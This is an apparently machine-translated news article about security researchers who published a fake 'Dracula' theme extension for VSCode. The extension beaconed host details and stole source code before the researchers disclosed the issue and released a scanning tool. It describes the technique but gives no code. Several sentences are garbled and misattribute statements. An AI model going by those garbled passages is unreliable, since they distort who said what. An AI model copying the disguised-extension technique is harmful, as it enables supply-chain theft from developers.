Attack Surface Management, Security Operations
Researchers use fake extensions to infiltrate major organizations
Prajit Nair (translator) •
June 13, 2024
Cybersecurity researchers say their experiment to develop fake and malicious extensions for the world’s most popular integrated development environment has exceeded their expectations.
reference: Automating Attack Surface Management: Failures and Solutions
Researchers Amit Assaraf, Itay Kuruk and Idan Dardikman have uploaded a color theme extension to Microsoft’s source code editing platform Visual Studio Code, posing as the “Official Dracula” color theme. record The number of installations is approximately 7.2 million.
Assaraf and his companions name The theme is “D’Arcula Official.”
Extensions are a key feature of VSCode, allowing developers to turn their VSCode instance into a customizable editor with the functionality they need beyond the basic features provided out of the box. In a blog post, Assaraf said there are about 60,000 VSCode extensions from about 45,000 different publishers. Of those, only about 1,800 have been verified, but becoming a verified publisher turned out to be a bit more difficult than verifying control of the domain, which the researchers did. darculatheme.com
.
The extension quickly gained popularity and was installed more than 100 times in a single day, including on Windows machines belonging to a publicly traded company with a market capitalization of $483 billion, which Assaraf declined to reveal. The fake extension stole source code and also sent out beacons containing details about the host machine, including hostname, domain, platform and number of installed extensions.
Their success is due to poor design choices made by Microsoft and Assaraf. I have written In a follow up blog post.
“Microsoft does not implement any kind of permission management or visibility for installed extensions, so any extension can perform any API action,” he said. “For example, a theme extension that simply changes the colors in your IDE could execute code and read and write files without any visibility or explicit permission from the user.”
Microsoft also does not restrict what VSCode extensions can do on the host machine, “allowing them to spawn child processes, execute system calls, and import arbitrary NodeJS packages, which is highly dangerous.”The researcher also criticized Microsoft for allowing silent auto-updates of extensions, which paves the way for hackers to spread legitimate extensions and turn them malicious later.
The researchers investigated whether bad actors had previously used similar tactics and found 1,283 extensions containing malicious code that had been installed 229 million times, 8,161 extensions communicating with hardcoded IP addresses, 1,452 extensions running unknown executable binaries, and 2,304 extensions using another publisher’s GitHub repository as their official repository.
Following their findings, the researchers have begun a process of responsible disclosure to affected companies and have also developed a tool, ExtensionTotal, aimed at analyzing and assessing the risk of VSCode extensions.